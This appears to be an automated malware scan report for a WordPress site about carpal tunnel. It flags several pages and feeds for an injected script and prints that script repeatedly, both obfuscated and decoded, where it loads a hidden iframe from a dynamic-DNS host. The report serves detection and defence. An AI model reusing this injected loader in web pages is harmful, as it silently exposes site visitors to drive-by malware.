Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=helpmycarpaltunnel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://helpmycarpaltunnel.com/ | 200 OK Content-Length: 31817 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://helpmycarpaltunnel.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://helpmycarpaltunnel.com/wp-content/themes/simplex/includes/js/superfish.js?ver=3.1.2 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://helpmycarpaltunnel.com/?p=8 | 200 OK Content-Length: 11618 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/?feed=rss2&p=8 | 200 OK Content-Length: 2837 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://helpmycarpaltunnel.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://helpmycarpaltunnel.com/wp-trackback.php?p=8 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Dec 2014 20:39:10 GMT Location: http://helpmycarpaltunnel.com/?p=8 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://helpmycarpaltunnel.com/xmlrpc.php | clean |
http://helpmycarpaltunnel.com/?feed=rss2 | 200 OK Content-Length: 31283 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/?feed=comments-rss2 | 200 OK Content-Length: 2969 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/?p=6 | 200 OK Content-Length: 11834 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/?feed=rss2&p=6 | 200 OK Content-Length: 2833 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/wp-trackback.php?p=6 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Dec 2014 20:39:15 GMT Location: http://helpmycarpaltunnel.com/?p=6 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://helpmycarpaltunnel.com/xmlrpc.php | clean |
http://helpmycarpaltunnel.com/?p=4 | 200 OK Content-Length: 11096 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://helpmycarpaltunnel.com/?feed=rss2&p=4 | 200 OK Content-Length: 2845 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: helpmycarpaltunnel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:39:02 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: helpmycarpaltunnel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:39:02 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: helpmycarpaltunnel.com
Referer: http://www.google.com/search?q=helpmycarpaltunnel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: helpmycarpaltunnel.com
Referer: http://www.google.com/search?q=helpmycarpaltunnel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.